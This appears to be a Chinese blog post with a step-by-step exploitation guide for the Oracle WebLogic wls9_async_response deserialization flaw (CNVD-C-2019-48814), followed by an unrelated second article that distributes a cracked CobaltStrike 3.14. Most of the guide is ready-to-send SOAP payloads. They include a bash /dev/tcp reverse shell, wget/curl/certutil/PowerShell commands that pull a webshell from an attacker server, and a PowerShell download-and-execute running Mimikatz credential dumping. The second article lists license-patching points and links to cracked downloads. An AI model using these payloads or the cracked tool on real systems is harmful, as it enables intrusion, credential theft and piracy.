CNVD-C-2019-48814 Weblogic wls9_async_response 反序列 渗透测试
0x1.背景
首先,CNVD收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。
0x2.漏洞描述
攻击者利用该漏洞,可在未授权的情况下远程执行命令。从相关信息来看。 部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 也就是说漏洞出现在 wls9_async_response.war 这个包里面,来详细看一看。
0x3.影响范围
主要影响以下版本:
WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
0x4.复现漏洞环境
而今天复现的就是第一个版本,即WebLogic Server 10.3.6.0(wls1036_generic.jar)。
Kali2019\Win10(关闭安全中心实时防护下)
漏洞组件:bea_wls9_async_response.war
漏洞路径:http://ip:port/_async/AsyncResponseService
漏洞确认:访问漏洞路径存在以下页面,即有可能存在漏洞
漏洞利用(所有利用都需要被攻击机能够访问公网):
所有的POST报文都可以使用burpsuite完成,burpsuite破解、汉化、插件等相关教程:传送门
一、Linux下:
1、反弹shell
POST如下报文即可:
POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Content-Length: 853 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/vpsip/vpsport 0>&1</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
2、上传webshell
- 放置一个webshell.txt到公网
- POST以下报文 任选其一
报文一:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
报文二:
POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Content-Length: 789 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
3、访问webshell
http://ip:port/_async/webshell.jsp
二、Windows下
1、反弹shell
可直接使用黑客工具-后渗透工具-CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用如下报文即可
POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Content-Length: 861 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
- 放置一个webshell.txt到公网
- 使用以下报文 任选其一均可
报文一:
POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Content-Length: 854 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
报文二:
POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Content-Length: 854 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope> 3.访问webshell http://ip:port/_async/webshell.jsp
(注:上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/为默认路径,如果路径修改,可以配合反弹shell进行获取)
0x5.缓解措施
高危:预计网上很快会有该远程代码执行漏洞的POC,建议尽快升级软件和使用连接筛选器临时拒绝T3/T3s协议。
建议尽快安装安全更新补丁(可以使用BSU智能更新)或使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议:
连接筛选器:weblogic.security.net.ConnectionFilterImpl
规则示例: 0.0.0.0/0 7001 deny t3 t3s#拒绝所有访问
允许和拒绝指定IP规则示例:
192.168.1.0/24 7001 allow t3 t3s#允许指定IP段访问
192.168.2.0/24 * 7001 deny t3 t3s#拒绝指定IP段访问
连接筛选器说明参考:
https://docs.oracle.com/cd/E24329_01/web.1211/e24485/con_filtr.htm#SCPRG377
威胁推演:此漏洞为远程代码执行漏洞,基于全球使用该产品用户的数量和暴露在网上的端口情况,恶意攻击者可能会开发针对该漏洞的自动化攻击程序、黑客工具,实现漏洞利用成功后自动植入后门程序,并进一步释放矿工程序或是DDOS僵尸木马等恶意程序,从而影响到网站服务的正常提供。
安全运营建议:Oracle WebLogic历史上已经报过多个安全漏洞(其中也有反序列化漏洞),建议使用该产品的企业经常关注官方安全更新公告。
来源:https://bithack.io/forum/152
修正:此前没看急于发文,导致写错标题,对不起大家。感谢评论有个兄弟说出来,谢谢!
CobaltStrike3.14破解 安全工具
本文章向大家介绍CobaltStrike3.14破解,主要包括CobaltStrike3.14破解使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
简单的介绍(copy):
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。本期“安仔课堂”,ISEC实验室的陈老师带大家实战操作Cobalt Strike神器的使用。
最近有小伙伴问我要cobalt strike 3.14的版本,之前国际友人给了我3.14的Trial版但是一直没破解,正好破解了分享给大家。关于破解方法网上有很多不再多说,这里仅指出需要修改的文件。
关键文件:
去除试用限制:common/License.class
去除端口限制:aggressor/dialogs/ListenerDialog.class
程序逻辑:common/Authorization.class、dns/QuickSecurity.class
Xor编码逻辑:common/ArtifactUtils.class、encoders/XorEncoder.class
添加Xor.bin:resources/xor.bin、resources/xor64.bin
后门指纹:
server/ProfileEdits.class
Common/BaseArtifactUtils.class
Common/ListenerConfig.class
去除空格后门:common/WebTransforms.class
关于这个空格后门,本来是无意间想到然后瞅了一眼,发现3.14版本的竟然还有,官方不是说3.13版本就修复了么。
3.14版本空格后门存在的位置:
备份下载地址:https://github.com/Mr-xn/cobaltstrike-cracked
由于GayHub屏蔽了,故上传网盘:https://mir.cr/M47IQMCE , https://www.solidfiles.com/v/3PB26YqyrNvdL
原版试用下载地址:https://mir.cr/6MKQCOR2
原文地址:https://bithack.io/forum/310